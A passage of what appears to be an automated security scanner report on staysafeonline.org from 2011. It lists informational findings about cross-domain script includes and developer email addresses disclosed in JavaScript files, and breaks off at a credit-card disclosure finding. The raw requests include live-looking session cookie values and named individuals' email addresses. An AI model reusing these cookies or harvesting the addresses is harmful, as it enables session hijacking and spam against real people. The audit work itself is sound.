GET /for-business/gain-their-trust HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/for-business/protect-your-customers User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.17.8.1303045041553
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:35 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:17 GMT ETag: "e0c0991768061ee7a18f951d525fe3b8" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 29863 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.9. http://www.staysafeonline.org/for-business/protect-your-customers
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/for-business/protect-your-customers
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /for-business/protect-your-customers HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/cybersecurity-awareness-month/get-involved User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.16.8.1303045041553
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:32 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 08:27:46 GMT ETag: "908bd4ebb3b93bb93a87e88079b8accd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 30371 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.10. http://www.staysafeonline.org/for-business/resources-smallmed-sized-businesses
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/for-business/resources-smallmed-sized-businesses
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /for-business/resources-smallmed-sized-businesses HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/for-business/best-practices User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.19.8.1303045041553
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:41 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:21 GMT ETag: "c1c0c7bd227ac731473d84843f5482f9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 31708 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.11. http://www.staysafeonline.org/for-higher-education
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/for-higher-education
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /for-higher-education HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.6.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:54:16 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:12 GMT ETag: "849e34df3e77e53d16c9fc9335c041fe" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 33417 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.12. http://www.staysafeonline.org/higher-education/higher-ed-campaign-university-partners
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/higher-education/higher-ed-campaign-university-partners
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /higher-education/higher-ed-campaign-university-partners HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/higher-education/higher-education-campaign User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.6.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:54:16 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:14 GMT ETag: "8d35c77b5eaea41edff13407d901fab0" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 36875 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.13. http://www.staysafeonline.org/higher-education/higher-education-campaign
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/higher-education/higher-education-campaign
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /higher-education/higher-education-campaign HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/in-the-home/fixing-problems User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.5.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:54:09 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:04:13 GMT ETag: "d717eedada40bd700a508679531c8fac" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 37211 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.14. http://www.staysafeonline.org/in-the-home/fixing-problems
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/in-the-home/fixing-problems
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /in-the-home/fixing-problems HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/contact User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.4.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:54:06 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 12:03:59 GMT ETag: "dc32c63b62265cb14fa21cdb53279866" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 29910 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.15. http://www.staysafeonline.org/tools-resources/free-security-check-ups
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/tools-resources/free-security-check-ups
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /tools-resources/free-security-check-ups HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/higher-education/higher-ed-campaign-university-partners User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.10.9.1303044859548
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:54:29 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 07:11:06 GMT ETag: "e85c3335986ce28533568c1b0f3722f4" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 30794 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
4.16. http://www.staysafeonline.org/tools-resources/staysafeonline-videos
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/tools-resources/staysafeonline-videos
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/152/addthis_widget.js
Request
GET /tools-resources/staysafeonline-videos HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/tools-resources/free-security-check-ups User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.11.9.1303044859548
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:19 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 08:30:06 GMT ETag: "22715042f7ab19351d9e0ae768f5f2c2" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Content-Length: 37630 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"> </script>...[SNIP]...
5. Email addresses disclosed
previous
next
There are 5 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
5.1. http://www.staysafeonline.org/sites/all/modules/pngfix/jquery.pngFix.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/all/modules/pngfix/jquery.pngFix.js
Issue detail
The following email addresses were disclosed in the response:andreas.eberhard@gmail.com scott@filamentgroup.com
Request
GET /sites/all/modules/pngfix/jquery.pngFix.js HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:57 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 18:48:25 GMT ETag: "f7dd64-11e6-4917e85e3641d" Accept-Ranges: bytes Content-Length: 4582 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:57 GMT Connection: close Content-Type: application/javascript /** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * http://jquery.andreaseberhard.de/ * * Copyright (c) 2007 Andreas Eberhard * Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php) * * Changelog: * 11.09.2007 Version 1.1 * - removed noConflict * - added png-support for input type=image * - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com , http://www.filamentgroup.com * 31.05.2007 initial Version 1.0 * -------------------------------------------------------------------- * @example $(function(){$(document).pngFix();}); * @desc Fi...[SNIP]...
5.2. http://www.staysafeonline.org/sites/default/files/js/js_117b5c4dbad9c4374f2f70f767f163d8.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/js/js_117b5c4dbad9c4374f2f70f767f163d8.js
Issue detail
The following email addresses were disclosed in the response:andreas.eberhard@gmail.com scott@filamentgroup.com
Request
GET /sites/default/files/js/js_117b5c4dbad9c4374f2f70f767f163d8.js HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:11 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 01:07:08 GMT ETag: "12ea8bb-14850-4a112e4dd0d59" Accept-Ranges: bytes Content-Length: 84048 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 12:53:11 GMT Content-Type: application/javascript // $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $ /* * jQuery 1.2.6 - New Wave Javascript * * Copyright (c) 2008 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt)...[SNIP]... $(Drupal.Panels.autoAttach); })(jQuery); ; /** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * http://jquery.andreaseberhard.de/ * * Copyright (c) 2007 Andreas Eberhard * Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php) * * Changelog: * 11.09.2007 Version 1.1 * - removed noConflict * - added png-support for input type=image * - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com , http://www.filamentgroup.com * 31.05.2007 initial Version 1.0 * -------------------------------------------------------------------- * @example $(function(){$(document).pngFix();}); * @desc Fi...[SNIP]...
5.3. http://www.staysafeonline.org/sites/default/files/js/js_405a934312f7bcf547c4008cf17e9f27.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/js/js_405a934312f7bcf547c4008cf17e9f27.js
Issue detail
The following email addresses were disclosed in the response:andreas.eberhard@gmail.com scott@filamentgroup.com
Request
GET /sites/default/files/js/js_405a934312f7bcf547c4008cf17e9f27.js HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/contact User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.2.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:45 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 01:31:07 GMT ETag: "12ea8c1-12376-4a1133aab816d" Accept-Ranges: bytes Content-Length: 74614 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 12:53:45 GMT Content-Type: application/javascript // $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $ /* * jQuery 1.2.6 - New Wave Javascript * * Copyright (c) 2008 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt)...[SNIP]... $(Drupal.Panels.autoAttach); })(jQuery); ; /** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * http://jquery.andreaseberhard.de/ * * Copyright (c) 2007 Andreas Eberhard * Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php) * * Changelog: * 11.09.2007 Version 1.1 * - removed noConflict * - added png-support for input type=image * - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com , http://www.filamentgroup.com * 31.05.2007 initial Version 1.0 * -------------------------------------------------------------------- * @example $(function(){$(document).pngFix();}); * @desc Fi...[SNIP]...
5.4. http://www.staysafeonline.org/sites/default/files/js/js_5c7c317e356a065b00eee58962cae056.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/js/js_5c7c317e356a065b00eee58962cae056.js
Issue detail
The following email addresses were disclosed in the response:andreas.eberhard@gmail.com scott@filamentgroup.com
Request
GET /sites/default/files/js/js_5c7c317e356a065b00eee58962cae056.js HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/for-business User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; has_js=1; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.1.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:41 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 01:07:16 GMT ETag: "12ea8bd-11e4b-4a112e55d4d46" Accept-Ranges: bytes Content-Length: 73291 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 12:53:41 GMT Content-Type: application/javascript // $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $ /* * jQuery 1.2.6 - New Wave Javascript * * Copyright (c) 2008 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt)...[SNIP]... $(Drupal.Panels.autoAttach); })(jQuery); ; /** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * http://jquery.andreaseberhard.de/ * * Copyright (c) 2007 Andreas Eberhard * Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php) * * Changelog: * 11.09.2007 Version 1.1 * - removed noConflict * - added png-support for input type=image * - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com , http://www.filamentgroup.com * 31.05.2007 initial Version 1.0 * -------------------------------------------------------------------- * @example $(function(){$(document).pngFix();}); * @desc Fi...[SNIP]...
5.5. http://www.staysafeonline.org/sites/default/files/js/js_e80058fd44eacbfe509d9a44aee06465.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/js/js_e80058fd44eacbfe509d9a44aee06465.js
Issue detail
The following email addresses were disclosed in the response:andreas.eberhard@gmail.com scott@filamentgroup.com
Request
GET /sites/default/files/js/js_e80058fd44eacbfe509d9a44aee06465.js HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/higher-education/higher-education-campaign User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.5.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:54:09 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 02:45:24 GMT ETag: "12ea8c3-124a2-4a1144455ee4f" Accept-Ranges: bytes Content-Length: 74914 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 12:54:09 GMT Content-Type: application/javascript // $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $ /* * jQuery 1.2.6 - New Wave Javascript * * Copyright (c) 2008 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt)...[SNIP]... $(Drupal.Panels.autoAttach); })(jQuery); ; /** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * http://jquery.andreaseberhard.de/ * * Copyright (c) 2007 Andreas Eberhard * Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php) * * Changelog: * 11.09.2007 Version 1.1 * - removed noConflict * - added png-support for input type=image * - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com , http://www.filamentgroup.com * 31.05.2007 initial Version 1.0 * -------------------------------------------------------------------- * @example $(function(){$(document).pngFix();}); * @desc Fi...[SNIP]...
6. Credit card numbers disclosed
previous
next
There are 8 instances of this issue:
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
6.1. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Businesses%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20Businesses%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card number was disclosed in the response:
Request
